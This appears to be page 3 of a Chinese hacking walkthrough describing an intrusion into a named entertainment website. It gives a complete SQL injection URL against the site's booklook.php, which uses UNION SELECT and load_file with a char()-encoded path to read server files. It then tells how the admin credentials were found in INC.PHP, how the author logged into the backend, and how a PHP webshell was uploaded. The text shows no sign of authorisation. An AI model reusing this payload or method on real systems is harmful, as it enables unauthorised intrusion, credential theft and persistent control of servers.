上面不是说已经把路径爆出来了吗,咱就来先爆一下后台登录的页面
/data/webroot/xx/admin/index.php
构造的语句如下,load_file(char(文件路径的ascii值,用逗号隔开))也可以用十六进制!我们这里把它插入到5
http://zh.ouou.com/booklook.php?id=28%20and%201=2%20union%20select%201,2,3,4,load_file(char(47,100,97,116,97,47,119,101,98,114,111,111,116,47,122,104,47,97,100,109,105,110,47,105,110,100,101,120,46,112,104,112)),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
什么都没有???太不给面子了吧?不可能啊,查看源代码看看,是不是没有显示出来呢?(这是为什么呢?我都变态了哈)
看来代码确实是爆出来了,呵呵,只是没有在页面里显示,不过也没什么,无所谓的事,那我们就爆一个查看一下源代码就有喽,
黑客是不可以偷懒的哦(这是为什么呢?),逐个爆,看看INC.PHP的代码,不爆不知道,一爆吓一跳,原来管理员的登录验证都是在这个文件里,怪不得表里找不到!
哦了,知道了后台的账户和密码,下面就登录它后台吧!
看了一下后台,找了一个地方传个PHP的WEBSHELL,呵呵~!
上一页 [1] [2] [3]
[图文]对偶偶娱乐分站服务器的安全检测
您现在的位置: